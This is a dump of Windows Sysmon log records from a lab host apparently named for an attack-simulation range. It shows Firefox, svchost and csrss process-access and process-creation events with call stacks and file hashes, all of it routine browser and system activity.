Firefox\xul.dll+2ba9464|C:\Program Files\Mozilla Firefox\xul.dll+2bccd18|C:\Program Files\Mozilla Firefox\xul.dll+9c8ee4|C:\Program 
Files\Mozilla Firefox\xul.dll+a7a329|C:\Program Files\Mozilla Firefox\xul.dll+a801e6|C:\Program Files\Mozilla Firefox\xul.dll+3a8b3|C:\Program Files\Mozilla Firefox\xul.dll+f86fb0|C:\Program Files\Mozilla Firefox\xul.dll+f5c7ff|C:\Program Files\Mozilla Firefox\xul.dll+e11e|C:\Program Files\Mozilla Firefox\xul.dll+1cdbb8|C:\Program Files\Mozilla Firefox\xul.dll+1ccf4f|C:\Program Files\Mozilla Firefox\xul.dll+3d63039|C:\Program Files\Mozilla Firefox\xul.dll+3e1a2fb|C:\Program Files\Mozilla Firefox\xul.dll+3e1ba98|C:\Program Files\Mozilla Firefox\xul.dll+3e1bf63|C:\Program Files\Mozilla Firefox\firefox.exe+15a1 10341000x800000000000000017264Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:08.448{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-9468-6005-3D05-00000000A301}5136C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10409dd|C:\Program Files\Mozilla Firefox\xul.dll+101380a|C:\Program Files\Mozilla Firefox\xul.dll+10136f4|C:\Program Files\Mozilla Firefox\xul.dll+afc707|C:\Program Files\Mozilla Firefox\xul.dll+2ba9464|C:\Program Files\Mozilla Firefox\xul.dll+2bccd18|C:\Program Files\Mozilla Firefox\xul.dll+9c8ee4|C:\Program Files\Mozilla Firefox\xul.dll+a7a329|C:\Program Files\Mozilla Firefox\xul.dll+a801e6|C:\Program Files\Mozilla Firefox\xul.dll+3a8b3|C:\Program Files\Mozilla Firefox\xul.dll+f86fb0|C:\Program Files\Mozilla Firefox\xul.dll+f5c7ff|C:\Program Files\Mozilla Firefox\xul.dll+e11e|C:\Program Files\Mozilla Firefox\xul.dll+1cdbb8|C:\Program Files\Mozilla Firefox\xul.dll+1ccf4f|C:\Program Files\Mozilla Firefox\xul.dll+3d63039|C:\Program Files\Mozilla Firefox\xul.dll+3e1a2fb|C:\Program Files\Mozilla Firefox\xul.dll+3e1ba98|C:\Program Files\Mozilla 
Firefox\xul.dll+3e1bf63|C:\Program Files\Mozilla Firefox\firefox.exe+15a1 10341000x800000000000000017263Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:08.448{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-9468-6005-3D05-00000000A301}5136C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10409dd|C:\Program Files\Mozilla Firefox\xul.dll+101380a|C:\Program Files\Mozilla Firefox\xul.dll+10136f4|C:\Program Files\Mozilla Firefox\xul.dll+afc707|C:\Program Files\Mozilla Firefox\xul.dll+2ba9464|C:\Program Files\Mozilla Firefox\xul.dll+2bccd18|C:\Program Files\Mozilla Firefox\xul.dll+9c8ee4|C:\Program Files\Mozilla Firefox\xul.dll+a7a329|C:\Program Files\Mozilla Firefox\xul.dll+a801e6|C:\Program Files\Mozilla Firefox\xul.dll+3a8b3|C:\Program Files\Mozilla Firefox\xul.dll+f86fb0|C:\Program Files\Mozilla Firefox\xul.dll+f5c7ff|C:\Program Files\Mozilla Firefox\xul.dll+e11e|C:\Program Files\Mozilla Firefox\xul.dll+1cdbb8|C:\Program Files\Mozilla Firefox\xul.dll+1ccf4f|C:\Program Files\Mozilla Firefox\xul.dll+3d63039|C:\Program Files\Mozilla Firefox\xul.dll+3e1a2fb|C:\Program Files\Mozilla Firefox\xul.dll+3e1ba98|C:\Program Files\Mozilla Firefox\xul.dll+3e1bf63|C:\Program Files\Mozilla Firefox\firefox.exe+15a1 10341000x800000000000000017262Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:08.448{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-9468-6005-3D05-00000000A301}5136C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program 
Files\Mozilla Firefox\xul.dll+10409dd|C:\Program Files\Mozilla Firefox\xul.dll+101380a|C:\Program Files\Mozilla Firefox\xul.dll+10136f4|C:\Program Files\Mozilla Firefox\xul.dll+afc707|C:\Program Files\Mozilla Firefox\xul.dll+2ba9464|C:\Program Files\Mozilla Firefox\xul.dll+2bccd18|C:\Program Files\Mozilla Firefox\xul.dll+9c8ee4|C:\Program Files\Mozilla Firefox\xul.dll+a7a329|C:\Program Files\Mozilla Firefox\xul.dll+a801e6|C:\Program Files\Mozilla Firefox\xul.dll+3a8b3|C:\Program Files\Mozilla Firefox\xul.dll+f86fb0|C:\Program Files\Mozilla Firefox\xul.dll+f5c7ff|C:\Program Files\Mozilla Firefox\xul.dll+e11e|C:\Program Files\Mozilla Firefox\xul.dll+1cdbb8|C:\Program Files\Mozilla Firefox\xul.dll+1ccf4f|C:\Program Files\Mozilla Firefox\xul.dll+3d63039|C:\Program Files\Mozilla Firefox\xul.dll+3e1a2fb|C:\Program Files\Mozilla Firefox\xul.dll+3e1ba98|C:\Program Files\Mozilla Firefox\xul.dll+3e1bf63|C:\Program Files\Mozilla Firefox\firefox.exe+15a1 10341000x800000000000000017261Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:08.448{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-9468-6005-3D05-00000000A301}5136C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10409dd|C:\Program Files\Mozilla Firefox\xul.dll+101380a|C:\Program Files\Mozilla Firefox\xul.dll+10136f4|C:\Program Files\Mozilla Firefox\xul.dll+afc707|C:\Program Files\Mozilla Firefox\xul.dll+2ba9464|C:\Program Files\Mozilla Firefox\xul.dll+2bccd18|C:\Program Files\Mozilla Firefox\xul.dll+9c8ee4|C:\Program Files\Mozilla Firefox\xul.dll+a7a329|C:\Program Files\Mozilla Firefox\xul.dll+a801e6|C:\Program Files\Mozilla Firefox\xul.dll+3a8b3|C:\Program Files\Mozilla Firefox\xul.dll+f86fb0|C:\Program Files\Mozilla 
Firefox\xul.dll+f5c7ff|C:\Program Files\Mozilla Firefox\xul.dll+e11e|C:\Program Files\Mozilla Firefox\xul.dll+1cdbb8|C:\Program Files\Mozilla Firefox\xul.dll+1ccf4f|C:\Program Files\Mozilla Firefox\xul.dll+3d63039|C:\Program Files\Mozilla Firefox\xul.dll+3e1a2fb|C:\Program Files\Mozilla Firefox\xul.dll+3e1ba98|C:\Program Files\Mozilla Firefox\xul.dll+3e1bf63|C:\Program Files\Mozilla Firefox\firefox.exe+15a1 10341000x800000000000000017260Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:08.448{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-9468-6005-3D05-00000000A301}5136C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10409dd|C:\Program Files\Mozilla Firefox\xul.dll+101380a|C:\Program Files\Mozilla Firefox\xul.dll+10136f4|C:\Program Files\Mozilla Firefox\xul.dll+afc707|C:\Program Files\Mozilla Firefox\xul.dll+2ba9464|C:\Program Files\Mozilla Firefox\xul.dll+2bccd18|C:\Program Files\Mozilla Firefox\xul.dll+9c8ee4|C:\Program Files\Mozilla Firefox\xul.dll+a7a329|C:\Program Files\Mozilla Firefox\xul.dll+a801e6|C:\Program Files\Mozilla Firefox\xul.dll+3a8b3|C:\Program Files\Mozilla Firefox\xul.dll+f86fb0|C:\Program Files\Mozilla Firefox\xul.dll+f5c7ff|C:\Program Files\Mozilla Firefox\xul.dll+e11e|C:\Program Files\Mozilla Firefox\xul.dll+1cdbb8|C:\Program Files\Mozilla Firefox\xul.dll+1ccf4f|C:\Program Files\Mozilla Firefox\xul.dll+3d63039|C:\Program Files\Mozilla Firefox\xul.dll+3e1a2fb|C:\Program Files\Mozilla Firefox\xul.dll+3e1ba98|C:\Program Files\Mozilla Firefox\xul.dll+3e1bf63|C:\Program Files\Mozilla Firefox\firefox.exe+15a1 10341000x800000000000000017259Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
14:00:08.448{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-9468-6005-3D05-00000000A301}5136C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10409dd|C:\Program Files\Mozilla Firefox\xul.dll+101380a|C:\Program Files\Mozilla Firefox\xul.dll+10136f4|C:\Program Files\Mozilla Firefox\xul.dll+afc707|C:\Program Files\Mozilla Firefox\xul.dll+2ba9464|C:\Program Files\Mozilla Firefox\xul.dll+2bccd18|C:\Program Files\Mozilla Firefox\xul.dll+9c8ee4|C:\Program Files\Mozilla Firefox\xul.dll+a7a329|C:\Program Files\Mozilla Firefox\xul.dll+a801e6|C:\Program Files\Mozilla Firefox\xul.dll+3a8b3|C:\Program Files\Mozilla Firefox\xul.dll+f86fb0|C:\Program Files\Mozilla Firefox\xul.dll+f5c7ff|C:\Program Files\Mozilla Firefox\xul.dll+e11e|C:\Program Files\Mozilla Firefox\xul.dll+1cdbb8|C:\Program Files\Mozilla Firefox\xul.dll+1ccf4f|C:\Program Files\Mozilla Firefox\xul.dll+3d63039|C:\Program Files\Mozilla Firefox\xul.dll+3e1a2fb|C:\Program Files\Mozilla Firefox\xul.dll+3e1ba98|C:\Program Files\Mozilla Firefox\xul.dll+3e1bf63|C:\Program Files\Mozilla Firefox\firefox.exe+15a1 10341000x800000000000000017258Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:08.448{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-9468-6005-3D05-00000000A301}5136C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10409dd|C:\Program Files\Mozilla Firefox\xul.dll+101380a|C:\Program Files\Mozilla Firefox\xul.dll+10136f4|C:\Program Files\Mozilla 
Firefox\xul.dll+afc707|C:\Program Files\Mozilla Firefox\xul.dll+2ba9464|C:\Program Files\Mozilla Firefox\xul.dll+2bccd18|C:\Program Files\Mozilla Firefox\xul.dll+9c8ee4|C:\Program Files\Mozilla Firefox\xul.dll+a7a329|C:\Program Files\Mozilla Firefox\xul.dll+a801e6|C:\Program Files\Mozilla Firefox\xul.dll+3a8b3|C:\Program Files\Mozilla Firefox\xul.dll+f86fb0|C:\Program Files\Mozilla Firefox\xul.dll+f5c7ff|C:\Program Files\Mozilla Firefox\xul.dll+e11e|C:\Program Files\Mozilla Firefox\xul.dll+1cdbb8|C:\Program Files\Mozilla Firefox\xul.dll+1ccf4f|C:\Program Files\Mozilla Firefox\xul.dll+3d63039|C:\Program Files\Mozilla Firefox\xul.dll+3e1a2fb|C:\Program Files\Mozilla Firefox\xul.dll+3e1ba98|C:\Program Files\Mozilla Firefox\xul.dll+3e1bf63|C:\Program Files\Mozilla Firefox\firefox.exe+15a1 10341000x800000000000000017257Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:08.448{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-9468-6005-3D05-00000000A301}5136C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10409dd|C:\Program Files\Mozilla Firefox\xul.dll+101380a|C:\Program Files\Mozilla Firefox\xul.dll+10136f4|C:\Program Files\Mozilla Firefox\xul.dll+afc707|C:\Program Files\Mozilla Firefox\xul.dll+2ba9464|C:\Program Files\Mozilla Firefox\xul.dll+2bccd18|C:\Program Files\Mozilla Firefox\xul.dll+9c8ee4|C:\Program Files\Mozilla Firefox\xul.dll+a7a329|C:\Program Files\Mozilla Firefox\xul.dll+a801e6|C:\Program Files\Mozilla Firefox\xul.dll+3a8b3|C:\Program Files\Mozilla Firefox\xul.dll+f86fb0|C:\Program Files\Mozilla Firefox\xul.dll+f5c7ff|C:\Program Files\Mozilla Firefox\xul.dll+e11e|C:\Program Files\Mozilla Firefox\xul.dll+1cdbb8|C:\Program Files\Mozilla Firefox\xul.dll+1ccf4f|C:\Program 
Files\Mozilla Firefox\xul.dll+3d63039|C:\Program Files\Mozilla Firefox\xul.dll+3e1a2fb|C:\Program Files\Mozilla Firefox\xul.dll+3e1ba98|C:\Program Files\Mozilla Firefox\xul.dll+3e1bf63|C:\Program Files\Mozilla Firefox\firefox.exe+15a1 10341000x800000000000000017256Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:08.448{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-9468-6005-3D05-00000000A301}5136C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10138a6|C:\Program Files\Mozilla Firefox\xul.dll+2bd4b22|C:\Program Files\Mozilla Firefox\xul.dll+2ba9421|C:\Program Files\Mozilla Firefox\xul.dll+2bccd18|C:\Program Files\Mozilla Firefox\xul.dll+9c8ee4|C:\Program Files\Mozilla Firefox\xul.dll+a7a329|C:\Program Files\Mozilla Firefox\xul.dll+a801e6|C:\Program Files\Mozilla Firefox\xul.dll+3a8b3|C:\Program Files\Mozilla Firefox\xul.dll+f86fb0|C:\Program Files\Mozilla Firefox\xul.dll+f5c7ff|C:\Program Files\Mozilla Firefox\xul.dll+e11e|C:\Program Files\Mozilla Firefox\xul.dll+1cdbb8|C:\Program Files\Mozilla Firefox\xul.dll+1ccf4f|C:\Program Files\Mozilla Firefox\xul.dll+3d63039|C:\Program Files\Mozilla Firefox\xul.dll+3e1a2fb|C:\Program Files\Mozilla Firefox\xul.dll+3e1ba98|C:\Program Files\Mozilla Firefox\xul.dll+3e1bf63|C:\Program Files\Mozilla Firefox\firefox.exe+15a1|C:\Program Files\Mozilla Firefox\firefox.exe+5ae18|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x800000000000000017255Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:08.448{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-9468-6005-3D05-00000000A301}5136C:\Program Files\Mozilla 
Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+2ba9393|C:\Program Files\Mozilla Firefox\xul.dll+2bccd18|C:\Program Files\Mozilla Firefox\xul.dll+9c8ee4|C:\Program Files\Mozilla Firefox\xul.dll+a7a329|C:\Program Files\Mozilla Firefox\xul.dll+a801e6|C:\Program Files\Mozilla Firefox\xul.dll+3a8b3|C:\Program Files\Mozilla Firefox\xul.dll+f86fb0|C:\Program Files\Mozilla Firefox\xul.dll+f5c7ff|C:\Program Files\Mozilla Firefox\xul.dll+e11e|C:\Program Files\Mozilla Firefox\xul.dll+1cdbb8|C:\Program Files\Mozilla Firefox\xul.dll+1ccf4f|C:\Program Files\Mozilla Firefox\xul.dll+3d63039|C:\Program Files\Mozilla Firefox\xul.dll+3e1a2fb|C:\Program Files\Mozilla Firefox\xul.dll+3e1ba98|C:\Program Files\Mozilla Firefox\xul.dll+3e1bf63|C:\Program Files\Mozilla Firefox\firefox.exe+15a1|C:\Program Files\Mozilla Firefox\firefox.exe+5ae18|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017254Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:08.448{59A5CD1D-945A-6005-3305-00000000A301}70524608C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-9468-6005-3D05-00000000A301}5136C:\Program Files\Mozilla Firefox\firefox.exe0x101451C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+f7b5aa|C:\Program Files\Mozilla Firefox\xul.dll+9c8ee4|C:\Program Files\Mozilla Firefox\xul.dll+e485|C:\Program Files\Mozilla Firefox\xul.dll+f532a1|C:\Program Files\Mozilla Firefox\xul.dll+e1b5|C:\Program Files\Mozilla Firefox\xul.dll+f5c7ff|C:\Program Files\Mozilla Firefox\xul.dll+c0a4|C:\Program Files\Mozilla Firefox\xul.dll+f53f81|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x800000000000000017253Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:08.448{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017252Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:08.448{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017251Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
14:00:08.448{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017250Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:08.448{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017249Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:08.448{59A5CD1D-93F6-6005-E604-00000000A301}48883504C:\Windows\system32\csrss.exe{59A5CD1D-9468-6005-3D05-00000000A301}5136C:\Program 
Files\Mozilla Firefox\firefox.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000017248Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:08.448{59A5CD1D-945A-6005-3305-00000000A301}70526964C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-9468-6005-3D05-00000000A301}5136C:\Program Files\Mozilla Firefox\firefox.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\ADVAPI32.dll+1845f|C:\Program Files\Mozilla Firefox\firefox.exe+50312|C:\Program Files\Mozilla Firefox\firefox.exe+2d163|C:\Program Files\Mozilla Firefox\xul.dll+9cb21b|C:\Program Files\Mozilla Firefox\xul.dll+f7278c|C:\Program Files\Mozilla Firefox\xul.dll+f70052|C:\Program Files\Mozilla Firefox\xul.dll+f7c85e|C:\Program Files\Mozilla Firefox\xul.dll+a81e44|C:\Program Files\Mozilla Firefox\xul.dll+3af91|C:\Program Files\Mozilla Firefox\xul.dll+39cbd|C:\Program Files\Mozilla Firefox\xul.dll+f5c7ff|C:\Program Files\Mozilla Firefox\xul.dll+e11e|C:\Program Files\Mozilla Firefox\xul.dll+a88d85|C:\Program Files\Mozilla Firefox\nss3.dll+12e8aa|C:\Program Files\Mozilla Firefox\nss3.dll+11f961|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000017247Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:08.461{59A5CD1D-9468-6005-3D05-00000000A301}5136C:\Program Files\Mozilla Firefox\firefox.exe84.0.2FirefoxFirefoxMozilla Corporationfirefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="7052.41.610208362\2054878469" -childID 6 -isForBrowser -prefsHandle 2500 -prefMapHandle 2496 -prefsLen 12864 -prefMapSize 229288 -parentBuildID 20210105180113 -appdir "C:\Program Files\Mozilla Firefox\browser" - 7052 
"\\.\pipe\gecko-crash-server-pipe.7052" 2484 tabC:\Program Files\Mozilla Firefox\ATTACKRANGE\Administrator{59A5CD1D-93F8-6005-49A2-2C0000000000}0x2ca2492LowMD5=6B3FC10BA1FB445C6772D076860B0F3B,SHA256=080A31499728B001B28FA8A386A73A800A190B91B129127E597D8E67549C1D86,IMPHASH=5ED80EE3BE69CAE0F2D23403B0DC50DC{59A5CD1D-945A-6005-3305-00000000A301}7052C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -first-startup 10341000x800000000000000017246Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:08.448{59A5CD1D-8E46-6005-1200-00000000A301}12124900C:\Windows\System32\svchost.exe{59A5CD1D-9468-6005-3D05-00000000A301}5136C:\Program Files\Mozilla Firefox\firefox.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac06|c:\windows\system32\pcasvc.dll+aa66|c:\windows\system32\pcasvc.dll+aa28|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017245Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:08.443{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945F-6005-3805-00000000A301}4560C:\Program Files\Mozilla Firefox\firefox.exe0x2200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1216761|C:\Program Files\Mozilla Firefox\xul.dll+2bd81dd|C:\Program Files\Mozilla Firefox\xul.dll+2bd0ec9|C:\Program Files\Mozilla Firefox\xul.dll+2bd18cd|C:\Program Files\Mozilla Firefox\xul.dll+2ba6aa4|C:\Program Files\Mozilla Firefox\xul.dll+3aeb1ce|C:\Program Files\Mozilla Firefox\xul.dll+ec31bc|C:\Program Files\Mozilla Firefox\xul.dll+ec661f|C:\Program Files\Mozilla Firefox\xul.dll+e1e321|C:\Program Files\Mozilla Firefox\xul.dll+348add|C:\Program Files\Mozilla Firefox\xul.dll+ecf5e7|C:\Program Files\Mozilla Firefox\xul.dll+e4a21b|C:\Program Files\Mozilla 
